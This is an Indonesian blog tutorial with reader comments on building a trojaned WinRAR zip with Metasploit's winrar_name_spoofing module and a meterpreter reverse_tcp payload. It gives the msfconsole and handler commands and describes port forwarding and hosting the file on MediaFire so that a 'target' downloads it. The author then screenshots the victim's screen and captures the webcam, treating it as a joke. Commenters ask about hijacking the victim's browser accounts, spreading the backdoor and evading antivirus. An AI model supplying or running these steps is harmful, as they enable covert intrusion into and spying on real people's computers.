Sebelumnya saya ucapkan selamat tahun baru 2016, semoga ini menjadi lembaran baru yang lebih baik, semoga lebih maju dan sukses untuk kita semua. di awal tahun ini saya masih membahas tentang metasploit, saya akan memberikan tutorial tentang cara Exploit Windows Menggunakan Winrar, oke langsung saja di simak langkah-langkahnya
service postgresql start
service metaploit start
selanjutnya buka msfconsole
Keterangan:
Temmplate_Anherr.zip >> Nama File backdor yang di buat (saya ilustrasikan ini merupakan template blog)
Template.txt >> isi dari Temmplate_Anherr.zip
36.70.XXX.XXX >> Ip Public
oke setelah pembuatan backdoor selesai dan di upload, kita jalankan perintah exploit
Catatan: untuk lhost isikan ip local
Saya coba cek informasi sytem korban
Selanjutnya saya coba ambil screenshot laptop korban , dan coba capture wbcam korban
ini hasilnya
sepertinya dia lagi galau broo,wkwkw
udah segitu aja percobaan kali ini
msfconsole
Setelah msfconsole terbuka kita buat backdor dengan format .zip, ikutin saja perintahnya
use exploit/windows/fileformat/winrar_name_spoofing
set payload windows/meterpreter/reverse_tcp
set filename Template_Anherr.zip
set spoof template.txt
set lhost 36.70.XXX.XXX
exploit
Keterangan:
Temmplate_Anherr.zip >> Nama File backdor yang di buat (saya ilustrasikan ini merupakan template blog)
Template.txt >> isi dari Temmplate_Anherr.zip
36.70.XXX.XXX >> Ip Public
kenapa saya lhostnya menggunakan ip public, ya karena target yang akan di exploit kali ini adalah berbeda jaringan. jangan lupa jika menggunakan ip public kalian harus setting port foward pada router. ceklist pada DMZ Enabled
Selanjutnya kita ambil backdoor tadi di folder /root/.msf4/local/ Kemudian upload , disini saya uplod di mediafire, kalian juga bisa coba tempat upload file yang lain.use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.06
exploit
Catatan: untuk lhost isikan ip local
setelah itu kita berikan backdoor tersebut ke target, berikan link yang buat download backdoor tadi ke target :D
Kita tunggu dulu broo, sampai targett download dan membuka file backdoor tadi
dan taraaa...!! ternyata exploit berhasil, meterpreter session opened :vSaya coba cek informasi sytem korban
sysinfo
Selanjutnya saya coba ambil screenshot laptop korban , dan coba capture wbcam korban
sepertinya dia lagi galau broo,wkwkw
udah segitu aja percobaan kali ini
ini hanya untuk pembelajaran semata, target saya disini adalah temen saya sendiri, sebelumnya saya sudah meminta dan sudah di beri izin untuk melakuakn percobaan ini. penyalahgunaan dari tutorial ini itu diluar tanggung jawab saya.
oke sekian tutorial mengenai cara Exploit Windows Menggunakan Winrar dengan Metasploit semoga bermanfaat bagi kita semua.
anjay foto gau di tempel . =))
BalasHapusitu backdornya cuma di download aja?
BalasHapusiya terus d buka pake winrar bro, kita bisa masuk meterpreter kalo target buka file yg ada d dalam winrar tersebut
Hapusgan kok gini root@Knuckleman:~# service metasploit start
BalasHapusFailed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory.
untuk kali linux 2 cara menjalankan metasploit memang sdikit berbeda mas, pke perintah ini
Hapus/etc/init.d/postgresql start
msfdb init
msfconsole
posisi backdoor udah nyangkut gan, mau nanya, apa ada perintah untuk eksekusi browser korban? biar bisa ambil alih akun2 nya gitu :D
BalasHapuscara setting forwad nya gimana
BalasHapusSetting di routernya mas
Hapusset port forwarding di android bisa gak kak @-)
HapusKorban udah buka backdoor tapi di terminal gak ada session apa pun .?
BalasHapusudah set PORT Forwading seperti di tutor kira kira salah apanya.?
bahaya nih kalau download aplikasi diblog ini, bisa* kena hack nantinya
BalasHapuskalo tanpa router gimana ya
BalasHapuskalo misalkan kita sebar ke blog atau website lain apakah bisa work backdoor ini
BalasHapusklo pke modem usb bisa ngk???
BalasHapusom lihat settingan routernya dong, kenapa ane gagal mulu ya
BalasHapuskalau wifi nya fiberhome gmna liat dmz nya
BalasHapus1. Ini sih cuman bisa di tes kalo dirumah pribadi pasang internet wifi ni, soalnya pake setting2 router segala. Kalau kita lagi di cafe gimana gan ? Secara kan kita ga bisa ngakses atau setting router cafe tsb.
BalasHapus2. Backdoornya terlalu sederhana gan, kira2 backdoor yg begitu doang bisa tembus av ga ? Ntar pas di donlod korban langsung dihapus av laptop korban pula ntu backdoor